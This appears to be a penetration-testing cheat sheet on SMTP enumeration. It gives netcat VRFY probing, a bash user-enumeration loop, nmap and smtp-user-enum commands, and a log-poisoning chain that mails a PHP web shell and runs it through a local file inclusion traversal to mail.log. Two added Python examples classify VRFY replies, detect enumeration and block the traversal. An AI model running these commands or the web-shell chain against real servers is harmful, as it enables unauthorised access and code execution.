SMTP Enum

CheckList

  • Check for version
  • LFI chaining log file poisoning
  • User enumeration

Grab the banner and VRFY

nc -nv 10.11.12.8 25
VRFY bob
250 2.1.5 [email protected] <--- Output if user exists
VRFY idontexist
550 5.1.1 idontexist... User unknown <--- Output if user does not exist
EXPN request: asks the server for the membership of a mailing list
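How to read those replies, and what a hardened server answers instead, as an added Python example (not from these notes): it parses RFC 5321 reply lines, classifies the VRFY outcome including the 252 "cannot VRFY" reply that a server with VRFY disabled (e.g. Postfix with disable_vrfy_command=yes) gives for every name, and runs a simple detector over constructed log lines to flag a source walking a wordlist. The log line format and the sample addresses are assumptions made for the example.

```python
"""SMTP VRFY reply classification plus a simple VRFY/EXPN enumeration detector.

Added example, not part of these notes. Reply lines follow RFC 5321 (3-digit
code) with an optional RFC 3463 enhanced status code. SAMPLE_LOG is a
constructed log format for the example, not any real MTA's log syntax.
"""
import re
from collections import defaultdict

# 3-digit code, space or hyphen (hyphen = multi-line reply), optional x.y.z enhanced code, text
REPLY_RE = re.compile(r"^(\d{3})[ -](?:(\d\.\d{1,3}\.\d{1,3}) )?(.*)$")


def parse_reply(line):
    """Split one SMTP reply line into (code, enhanced_status_or_None, text)."""
    m = REPLY_RE.match(line.strip())
    if not m:
        raise ValueError("not an SMTP reply line: %r" % line)
    code, enhanced, text = m.groups()
    return int(code), enhanced, text


def classify_vrfy(line):
    """Interpret the reply to a VRFY command.

    250         -> address confirmed (the leak the checklist looks for)
    252         -> server will not confirm (e.g. Postfix with disable_vrfy_command=yes);
                   every name gets the same answer, so nothing is leaked
    550/551/553 -> address unknown or not local
    502         -> VRFY not implemented
    """
    code, _, _ = parse_reply(line)
    if code == 250:
        return "exists"
    if code == 252:
        return "unverifiable"
    if code in (550, 551, 553):
        return "unknown"
    if code == 502:
        return "not_implemented"
    return "other"


# Constructed sample: one source walks a wordlist, another sends a single VRFY.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z src=203.0.113.5 cmd=VRFY arg=root reply=550",
    "2024-05-01T10:00:01Z src=203.0.113.5 cmd=VRFY arg=admin reply=550",
    "2024-05-01T10:00:02Z src=203.0.113.5 cmd=VRFY arg=bob reply=250",
    "2024-05-01T10:00:02Z src=203.0.113.5 cmd=VRFY arg=alice reply=550",
    "2024-05-01T10:00:03Z src=203.0.113.5 cmd=EXPN arg=staff reply=550",
    "2024-05-01T10:00:03Z src=203.0.113.5 cmd=VRFY arg=test reply=550",
    "2024-05-01T10:00:05Z src=198.51.100.7 cmd=VRFY arg=postmaster reply=250",
    "2024-05-01T10:00:06Z src=198.51.100.7 cmd=MAIL arg=<x@example.com> reply=250",
]
LOG_RE = re.compile(r"src=(?P<src>\S+) cmd=(?P<cmd>\w+) arg=(?P<arg>\S*) reply=(?P<reply>\d{3})")


def detect_vrfy_enumeration(log_lines, threshold=5):
    """Return per-source stats for sources issuing >= threshold VRFY/EXPN probes.

    Many probes with mostly 5xx answers from one source is the signature of a
    wordlist run such as the VRFY loop in these notes.
    """
    stats = defaultdict(lambda: {"probes": 0, "targets": set(), "unknown": 0})
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or m["cmd"] not in ("VRFY", "EXPN"):
            continue
        s = stats[m["src"]]
        s["probes"] += 1
        s["targets"].add(m["arg"])
        if int(m["reply"]) >= 500:
            s["unknown"] += 1
    return {
        src: {"probes": s["probes"], "distinct": len(s["targets"]), "unknown": s["unknown"]}
        for src, s in stats.items()
        if s["probes"] >= threshold
    }


if __name__ == "__main__":
    for reply in ("250 2.1.5 bob@example.com",
                  "550 5.1.1 idontexist... User unknown",
                  "252 2.0.0 VRFY command is disabled"):
        print(reply, "->", classify_vrfy(reply))
    print(detect_vrfy_enumeration(SAMPLE_LOG))
```

The detector keys on the command name and reply class, not on the wordlist, so it also catches EXPN probing; the threshold is a tuning knob, since a mail admin doing a single VRFY by hand should not trip it.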

Bash Script for SMTP

#!/bin/bash
# VRFY Script: send VRFY for every name in users.txt to every host in numbers.txt
#############
for ips in $(cat numbers.txt); do      # numbers.txt: list of last octets of 10.11.1.x
  for user in $(cat users.txt); do     # users.txt: list of usernames
    # -w 1: give up after 1 s per host; keep only "250 ..." replies (user exists)
    echo "VRFY $user" | nc -nv -w 1 "10.11.1.$ips" 25 2>/dev/null | grep ^"250"
  done
done

SMTP nmap scripts

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

SMTP user enum

smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10

Code Execution through SMTP/LFI

telnet 10.10.10.10 25
EHLO sub.somedomain.com
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>
.
=================================================
Once the mail has been logged, the PHP payload sits in the mail log. Through the LFI you have discovered, include that log file and pass the command in the cmd variable (as the only parameter or appended to the existing query string):
?cmd=id
&cmd=id
Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
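On the application side, what makes this work is a file parameter joined to a directory and included without a check. Added Python example, not from these notes: the unchecked resolution that lets `../../../../../var/log/mail.log` escape the page directory, beside an allowlist and a realpath containment check that both reject it. TEMPLATE_DIR and the page names are assumed values for the example.

```python
"""Path check for a file-include parameter (added example, not from the notes).

Shows why `lfi.php?file=../../../../../var/log/mail.log` reaches the mail log
when the parameter is joined to a directory unchecked, and two ways to stop it:
an allowlist of page names, and a realpath containment check. TEMPLATE_DIR and
ALLOWED_PAGES are assumptions made for the example.
"""
import os

TEMPLATE_DIR = "/var/www/app/pages"           # assumed directory holding includable pages
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed allowlist of page names


def resolve_unchecked(base, user_value):
    """The vulnerable pattern: the request value is joined to base and used as-is.

    Enough '../' segments walk out of base, so any readable file can be included.
    """
    return os.path.normpath(os.path.join(base, user_value))


def resolve_allowlisted(page):
    """Preferred fix: map a short name to a fixed file; anything else is rejected."""
    if page not in ALLOWED_PAGES:
        return None
    return os.path.join(TEMPLATE_DIR, page + ".php")


def check_include_path(base, user_value, allowed_ext=".php"):
    """Containment check for cases where a filename must be accepted.

    Returns (True, resolved_path) or (False, reason). Symlinks are resolved on
    both sides before comparing, so a link inside base cannot point back out.
    """
    if "\x00" in user_value:
        return False, "null byte in path"
    base_real = os.path.realpath(base)
    # os.path.join discards base when user_value is absolute; realpath then
    # collapses any '..' so the comparison below sees the real target.
    candidate = os.path.realpath(os.path.join(base_real, user_value))
    if os.path.commonpath([base_real, candidate]) != base_real:
        return False, "path escapes base directory"
    if not candidate.endswith(allowed_ext):
        return False, "disallowed extension"
    return True, candidate


if __name__ == "__main__":
    traversal = "../../../../../var/log/mail.log"
    print("unchecked :", resolve_unchecked(TEMPLATE_DIR, traversal))
    print("allowlist :", resolve_allowlisted(traversal))
    print("contained :", check_include_path(TEMPLATE_DIR, traversal))
    print("legit page:", check_include_path(TEMPLATE_DIR, "home.php"))
```

The allowlist is the stronger of the two fixes because it never turns user input into a path at all; the containment check is for the rarer case where arbitrary filenames under one directory really must be accepted, and even then the extension check keeps log files out.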